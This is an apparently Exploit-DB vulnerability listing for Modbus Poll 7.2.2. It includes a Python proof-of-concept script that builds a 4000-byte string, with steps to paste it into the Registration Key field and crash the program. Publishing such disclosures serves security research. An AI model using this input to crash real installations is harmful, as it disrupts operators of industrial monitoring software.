Modbus Poll 7.2.2 - Denial of Service (PoC)

vendor:

Modbus Poll

by:

Cemal Cihad ÇIFTÇI

7.5

CVSS

HIGH

DOS

CWE

Product Name: Modbus Poll

Affected Version From: 7.2.2002

Affected Version To: 7.2.2002

Patch Exists: NO

Related CWE:

CPE: a:modbus:poll:7.2.2

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional Service Pack 3

2018

Modbus Poll 7.2.2 – Denial of Service (PoC)

The Modbus Poll 7.2.2 software is vulnerable to a denial of service (DoS) attack. By providing a specially crafted payload, an attacker can cause the program to crash, resulting in a denial of service condition.

Mitigation:

Update to the latest version of Modbus Poll software.

Source

Exploit-DB raw data:

# Exploit Title: Modbus Poll 7.2.2 - Denial of Service (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-10-19
# Tested Version: 7.2.2
# Vulnerability Type: DOS
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: https://www.modbustools.com
# Download Link: https://www.modbustools.com/download.html

# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
# Now start the program. Now when you are inside of the program click Connection button and 
# click "connect". It will ask you for registration key. In the field: "Registration Key" 
# paste the copied content from "exploit.txt".
# Now click "OK" and see a crash! 

#!/usr/bin/python
   
buffer = "A" * 4000
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"